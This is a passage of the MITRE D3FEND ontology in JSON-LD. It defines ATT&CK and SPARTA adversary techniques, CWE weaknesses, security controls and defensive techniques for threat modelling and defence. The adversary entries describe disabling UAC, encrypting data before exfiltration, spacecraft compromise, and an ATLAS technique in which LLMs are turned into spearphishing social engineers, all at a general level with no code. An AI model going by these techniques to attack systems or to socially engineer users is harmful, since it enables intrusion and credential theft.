      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:DigitalEventRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A digital event record is a structured representation of a digital event, encapsulating all relevant details about the occurrence for storage, analysis, and response. These records serve as the primary artifacts for cybersecurity operations, enabling threat detection, forensic investigations, and compliance reporting. Digital event records include metadata such as timestamps, origin, context, and associated resources, ensuring traceability and actionable intelligence in digital ecosystems.",
      "d3f:records": {
        "@id": "d3f:DigitalEvent"
      },
      "rdfs:label": "Digital Event Record",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Record"
        },
        {
          "@id": "_:Neb48929158e1490ea1a8945c7a2167de"
        }
      ]
    },
    {
      "@id": "_:Neb48929158e1490ea1a8945c7a2167de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:records"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalEvent"
      }
    },
    {
      "@id": "d3f:T1191",
      "@type": "owl:Class",
      "d3f:attack-id": "T1191",
      "d3f:definition": "The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.003",
      "rdfs:label": "CMSTP",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.003"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:connected-to",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x connected-to y: The subject x shares a direct physical or logical link with object y such that communication is possible between them without intermediate routing.",
      "rdfs:label": "connected-to",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-FileEncryption101SafeguardingYourSensitiveData",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.veritas.com/information-center/file-encryption"
      },
      "d3f:kb-abstract": "File encryption is a security method that converts your files into ciphertext or unreadable data. By using this method, you may be sure that even if unauthorized people access your files, they won't be able to understand the contents without the decryption key.",
      "d3f:kb-author": "Veritas",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileEncryption"
      },
      "d3f:kb-reference-title": "File Encryption 101: Safeguarding Your Sensitive Data",
      "rdfs:label": "Reference -  File Encryption 101: Safeguarding Your Sensitive Data"
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-008%3ADisableUAC_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-008/"
      },
      "d3f:kb-abstract": "Threat actors often, after compromising a machine, try to disable User Access Control (UAC) to escalate privileges. This is often done by changing the registry key for system policies using “reg.exe”, a legitimate tool provided by Microsoft for modifying the registry via command prompt or scripts. This action interferes with UAC and may enable a threat actor to escalate privileges on the compromised system, thereby allowing further exploitation of the system.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-008: Disable UAC",
      "rdfs:label": "Reference - CAR-2021-01-008: Disable UAC - MITRE"
    },
    {
      "@id": "d3f:MailServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Within the Internet email system, a message transfer agent or mail transfer agent (MTA) or mail relay is software that transfers electronic mail messages from one computer to another using SMTP. The terms mail server, mail exchanger, and MX host are also used in some contexts. Messages exchanged across networks are passed between mail servers, including any attached data files (such as images, multimedia or documents). These servers also often keep mailboxes for email. Access to this email by end users is typically either via webmail or an email client.",
      "d3f:runs": {
        "@id": "d3f:MessageTransferAgent"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Message_transfer_agent"
      },
      "rdfs:label": "Mail Server",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Server"
        },
        {
          "@id": "_:N8e1303cb8d1a4d738f366bf9b9f50481"
        }
      ],
      "skos:altLabel": [
        "Email Server Resource",
        "MTA",
        "MX Host",
        "Mail Exchanger",
        "Mail transfer agent",
        "Message transfer agent"
      ]
    },
    {
      "@id": "_:N8e1303cb8d1a4d738f366bf9b9f50481",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MessageTransferAgent"
      }
    },
    {
      "@id": "d3f:Grid-CNN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GC",
      "d3f:definition": "A class of neural networks that specializes in processing data that has a grid-like topology, such as an image.",
      "d3f:kb-article": "## References\nTalukdar, P. (2020, June 10). Convolutional Neural Networks Explained. Towards Data Science. [Link](https://towardsdatascience.com/convolutional-neural-networks-explained-9cc5188c4939)",
      "rdfs:label": "Grid-CNN",
      "rdfs:subClassOf": {
        "@id": "d3f:ConvolutionalNeuralNetwork"
      }
    },
    {
      "@id": "d3f:CWE-408",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-408",
      "d3f:definition": "The product allows an entity to perform a legitimate but expensive operation before authentication or authorization has taken place.",
      "rdfs:label": "Incorrect Behavior Order: Early Amplification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-405"
        },
        {
          "@id": "d3f:CWE-696"
        }
      ]
    },
    {
      "@id": "d3f:RemoteResource",
      "@type": "owl:Class",
      "d3f:definition": "In computing, a remote  resource is a computer resource made available from one host to other hosts on a computer network. It is a device or piece of information on a computer that can be remotely accessed from another computer, typically via a local area network or an enterprise intranet.",
      "rdfs:label": "Remote Resource",
      "rdfs:seeAlso": {
        "@id": "d3f:NetworkResource"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:CWE-162",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-162",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Trailing Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:ProcessSuspension",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessSuspension"
      ],
      "d3f:d3fend-id": "D3-PS",
      "d3f:definition": "Suspending a running process on a computer system.",
      "d3f:kb-article": "## How it works\n\nA running process might be suspended to mitigate its immediate effects if it is exhibiting anomalous, unauthorized, or malicious behavior. Defenders may choose to suspend rather than terminate to analyze the process first and resume the process if deemed benign.\n\n### System-provided functions\n\n#### Windows tools\nIn Windows, the `PsSuspend` command line utility from the SysInternals Suite provides functionality to suspend processes on a local or remote system.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-PsSuspend"
      },
      "d3f:suspends": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Process Suspension",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEviction"
        },
        {
          "@id": "_:N532d37f70f734a0ca0217456804b44ef"
        }
      ]
    },
    {
      "@id": "_:N532d37f70f734a0ca0217456804b44ef",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:suspends"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:CWE-1229",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1229",
      "d3f:definition": "The product manages resources or behaves in a way that indirectly creates a new, distinct resource that can be used by attackers in violation of the intended policy.",
      "rdfs:label": "Creation of Emergent Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CCI-002607_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization installs security-relevant firmware updates within an organization-defined time period of the release of the updates.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002607"
    },
    {
      "@id": "d3f:CWE-1022",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1022",
      "d3f:definition": "The web application produces links to untrusted external sites outside of its sphere of control, but it does not properly prevent the external site from modifying security-critical properties of the window.opener object, such as the location property.",
      "d3f:synonym": "tabnabbing",
      "rdfs:label": "Use of Web Link to Untrusted Target with window.opener Access",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-266"
      }
    },
    {
      "@id": "d3f:authenticates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x authenticates y: The subject x establishes the authenticity of some y. This relation indicates an authentication event has occurred.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01980375-s"
      },
      "rdfs:label": "authenticates",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:ATTACKMobileDefenseEvasionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0030"
      },
      "rdfs:label": "Defense Evasion Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N371fca4bc2cb4d44be7db144576a1f8c"
        }
      ],
      "skos:prefLabel": "Defense Evasion Technique"
    },
    {
      "@id": "_:N371fca4bc2cb4d44be7db144576a1f8c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0030"
      }
    },
    {
      "@id": "d3f:FileShareService",
      "@type": "owl:Class",
      "d3f:definition": "A file sharing service (or file share service) provides the ability to share data across a network.",
      "rdfs:label": "File Share Service",
      "rdfs:seeAlso": {
        "@id": "dbr:File_sharing"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkService"
      }
    },
    {
      "@id": "d3f:ATLASPrivilegeEscalationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0012"
      },
      "rdfs:label": "Privilege Escalation Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:Nca081de180ab47e9934ab447d8cf3b76"
        }
      ],
      "skos:prefLabel": "Privilege Escalation Technique"
    },
    {
      "@id": "_:Nca081de180ab47e9934ab447d8cf3b76",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0012"
      }
    },
    {
      "@id": "d3f:SuspendProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:suspends": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Suspend Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Na83fe2b292724711aeacd75bac9594fd"
        }
      ]
    },
    {
      "@id": "_:Na83fe2b292724711aeacd75bac9594fd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:suspends"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:LinuxWritev",
      "@type": "owl:Class",
      "d3f:definition": "Write data into multiple buffers.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/writev.2.html"
      },
      "rdfs:label": "Linux Writev",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteFile"
      }
    },
    {
      "@id": "d3f:T1650",
      "@type": "owl:Class",
      "d3f:attack-id": "T1650",
      "d3f:definition": "Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022)",
      "rdfs:label": "Acquire Access",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:Reference-SecurityVulnerabilityInformationAggregation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8544098B2"
      },
      "d3f:kb-abstract": "Security vulnerability information aggregation techniques are disclosed. Vulnerability information associated with one or more security vulnerabilities is obtained from multiple sources and aggregated into respective unified vulnerability definitions for the one or more security vulnerabilities. Aggregation may involve format conversion, content aggregation, or both in some embodiments. Unified vulnerability definitions may be distributed to vulnerability information consumers in accordance with consumer-specific policies. Storage of vulnerability information received from the sources may allow the aggregation process to be performed on existing vulnerability information “retro-actively”. Related data structures and Graphical User Interfaces (GUIs) are also disclosed.",
      "d3f:kb-author": "Christophe Gustave, Stanley Taihai Chow, Douglas Wiemer",
      "d3f:kb-organization": "Nokia Technologies Oy",
      "d3f:kb-reference-of": {
        "@id": "d3f:AssetVulnerabilityEnumeration"
      },
      "d3f:kb-reference-title": "Security vulnerability information aggregation",
      "rdfs:label": "Reference - Security vulnerability information aggregation"
    },
    {
      "@id": "d3f:AML.T0052.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0052.000",
      "d3f:definition": "Adversaries may turn LLMs into targeted social engineers.\nLLMs are capable of interacting with users via text conversations.\nThey can be instructed by an adversary to seek sensitive information from a user and act as effective social engineers.\nThey can be targeted towards particular personas defined by the adversary.\nThis allows adversaries to scale spearphishing efforts and target individuals to reveal private information such as credentials to privileged systems.",
      "rdfs:label": "Spearphishing via Social Engineering LLM - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0052.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0052"
      },
      "skos:prefLabel": "Spearphishing via Social Engineering LLM"
    },
    {
      "@id": "d3f:T1416",
      "@type": "owl:Class",
      "d3f:attack-id": "T1416",
      "d3f:definition": "Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1635.001",
      "rdfs:label": "URI Hijacking - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1635.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
      },
      "skos:prefLabel": "URI Hijacking"
    },
    {
      "@id": "d3f:T1018",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1018",
      "d3f:definition": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).",
      "d3f:may-access": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      },
      "d3f:may-invoke": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:CreateSocket"
        }
      ],
      "d3f:produces": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Remote System Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N6f8be91ed9d548718fb82dde44951001"
        },
        {
          "@id": "_:N24648fce8c5249a5961cad03f2d2ea92"
        },
        {
          "@id": "_:N650c232e2be14340af53ac010733e6af"
        },
        {
          "@id": "_:N64d810e057d345b5ada268da67ac8ef4"
        }
      ]
    },
    {
      "@id": "_:N6f8be91ed9d548718fb82dde44951001",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      }
    },
    {
      "@id": "_:N24648fce8c5249a5961cad03f2d2ea92",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N650c232e2be14340af53ac010733e6af",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateSocket"
      }
    },
    {
      "@id": "_:N64d810e057d345b5ada268da67ac8ef4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1496.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1496.001",
      "d3f:definition": "Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.",
      "rdfs:label": "Compute Hijacking",
      "rdfs:subClassOf": {
        "@id": "d3f:T1496"
      }
    },
    {
      "@id": "d3f:TA0109",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Lateral Movement - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Lateral Movement"
    },
    {
      "@id": "d3f:CWE-99",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-99",
      "d3f:definition": "The product receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control.",
      "d3f:synonym": "Insecure Direct Object Reference",
      "rdfs:label": "Improper Control of Resource Identifiers ('Resource Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-74"
      }
    },
    {
      "@id": "d3f:FQDNDomainName",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DomainName"
      ],
      "rdfs:label": "FQDN Domain Name"
    },
    {
      "@id": "d3f:CWE-913",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-913",
      "d3f:definition": "The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.",
      "rdfs:label": "Improper Control of Dynamically-Managed Code Resources",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:SMBFileOpenEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is opened if it exists, failing otherwise. This operation is used to access or query the existing file.",
      "rdfs:label": "SMB File Open Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SMBEvent"
        },
        {
          "@id": "_:Na9f6c78f15a642ff9da85f1de22b5ef2"
        }
      ]
    },
    {
      "@id": "_:Na9f6c78f15a642ff9da85f1de22b5ef2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SMBFileCreateEvent"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndApparatusForUtilizingATokenForResourceAccess_RsaSecurityInc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US5657388A/en"
      },
      "d3f:kb-abstract": "A method and apparatus for utilizing a token which is preferably a \"dumb token\" to provide secure access by authorized users to a selected resource. The token stores a secret user code in machine readable form, which code is read by a token processor. The token processor also receives a time-varying value and an algorithm, both of which may be stored or generated at either the token or the token processor and preferably a secret personal identification code which may be inputted at the token, but is preferably inputted at the token processor. The secret user code, time-varying value and secret personal identification code are then algorithmically combined by the algorithm, preferably in the token processor, to generate a one-time nonpredictable code which is transmitted to a host processor. The host processor utilizes the received one-time nonpredictable code to determine if the user is authorized access to the resource and grants access to the resource if the user is determined to be authorized. The system may be modified to operate in query/response mode. The token processor may be any of a variety of available portable remote processors or may be a device such as a telephone which is equipped with card or other token reader and with processing capability.",
      "d3f:kb-author": "Kenneth P. Weiss",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Rsa Security Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:kb-reference-title": "Method and apparatus for utilizing a token for resource access",
      "rdfs:label": "Reference - Method and apparatus for utilizing a token for resource access - Rsa Security Inc."
    },
    {
      "@id": "d3f:T1027.013",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.013",
      "d3f:definition": "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.",
      "rdfs:label": "Encrypted/Encoded File",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:T1560",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1560",
      "d3f:creates": {
        "@id": "d3f:ArchiveFile"
      },
      "d3f:definition": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.(Citation: DOJ GRU Indictment Jul 2018) Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.",
      "rdfs:label": "Archive Collected Data",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N45852c76811a4f2e9a49a90695a9a452"
        }
      ]
    },
    {
      "@id": "_:N45852c76811a4f2e9a49a90695a9a452",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ArchiveFile"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_9",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Account Management | Restrictions on Use of Shared and Group Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "AC-2(9)"
    },
    {
      "@id": "d3f:Reference-OSQueryWindowsUserCollectionCode",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SourceCodeReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://github.com/osquery/osquery/blob/d2be385d71f401c85872f00d479df8f499164c5a/osquery/tables/system/windows/users.cpp"
      },
      "d3f:kb-reference-title": "OS Query Windows User Collection Code",
      "rdfs:label": "Reference - OS Query Windows User Collection Code"
    },
    {
      "@id": "d3f:CWE-696",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-696",
      "d3f:definition": "The product performs multiple related behaviors, but the behaviors are performed in the wrong order in ways which may produce resultant weaknesses.",
      "rdfs:label": "Incorrect Behavior Order",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:RD-0002.03",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0002.03",
      "d3f:definition": "By compromising another operator’s spacecraft, or a hosted payload, an adversary can gain proximity, sensing, and relay capabilities that are costly to build from scratch and difficult to attribute. With control of an on-orbit asset, the actor may conduct local spectrum measurement and traffic analysis, attempt selective interference or spoofing at short range, or probe crosslinks and gateways where payload networks bridge to buses. In rideshare or hosted-payload contexts, weak segmentation and shared ground paths can provide insight into neighboring missions. More aggressive scenarios include remote proximity operations (RPO) to achieve advantageous geometry; however, physical grappling, docking, or exposure of debug/test interfaces is highly specialized and rare, with significant safety, legal, and tracking implications. Realistic attacker goals emphasize adjacency for RF leverage, covert relay, or data theft rather than mechanical capture.",
      "rdfs:label": "3rd-Party Spacecraft - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0002/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0002"
      },
      "skos:prefLabel": "3rd-Party Spacecraft"
    },
    {
      "@id": "d3f:CWE-144",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-144",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as line delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Line Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-140"
      }
    },
    {
      "@id": "d3f:T1448",
      "@type": "owl:Class",
      "d3f:attack-id": "T1448",
      "d3f:definition": "A malicious app may trigger fraudulent charges on a victim’s carrier billing statement in several different ways, including SMS toll fraud and SMS shortcodes that make purchases.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1643",
      "rdfs:label": "Carrier Billing Fraud - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1643"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Carrier Billing Fraud"
    },
    {
      "@id": "d3f:FreeMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:deletes": {
        "@id": "d3f:MemoryBlock"
      },
      "rdfs:label": "Free Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N204ac892bc24411d89ef426b5de67d6e"
        }
      ]
    },
    {
      "@id": "_:N204ac892bc24411d89ef426b5de67d6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:ATLASTechnique",
      "@type": "owl:Class",
      "d3f:definition": "An ATLAS Technique is an action conducted by adversaries to accomplish tactical goals within the context of artificial intelligence systems. These techniques articulate both 'how' adversaries execute these actions to reach their objectives and 'what' outcomes are achieved from these maneuvers.",
      "rdfs:label": "ATLAS Technique",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASThing"
      }
    },
    {
      "@id": "d3f:T1484.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1484.001",
      "d3f:definition": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)",
      "rdfs:label": "Group Policy Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:T1484"
      }
    },
    {
      "@id": "d3f:EmailAttachment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attached-to": {
        "@id": "d3f:Email"
      },
      "d3f:definition": "An email attachment is a computer file sent along with an email message. One or more files can be attached to any email message, and be sent along with it to the recipient. This is typically used as a simple method to share documents and images.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Email_attachment"
      },
      "rdfs:label": "Email Attachment",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DocumentFile"
        },
        {
          "@id": "_:N431dce6d332c48d3a3b225a742043330"
        }
      ]
    },
    {
      "@id": "_:N431dce6d332c48d3a3b225a742043330",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:attached-to"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:CWE-151",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-151",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as comment delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Comment Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:OfficeApplicationFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A document file in a format associated with an d3f:OfficeApplication.",
      "d3f:may-contain": {
        "@id": "d3f:ImageFile"
      },
      "rdfs:label": "Office Application File",
      "rdfs:seeAlso": {
        "@id": "d3f:OfficeApplication"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DocumentFile"
        },
        {
          "@id": "_:Nda12cce8da604e2ea50631faef8f824d"
        }
      ]
    },
    {
      "@id": "_:Nda12cce8da604e2ea50631faef8f824d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ImageFile"
      }
    },
    {
      "@id": "d3f:PhysicalLinkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PhysicalLinkMapping"
      ],
      "d3f:d3fend-id": "D3-PLM",
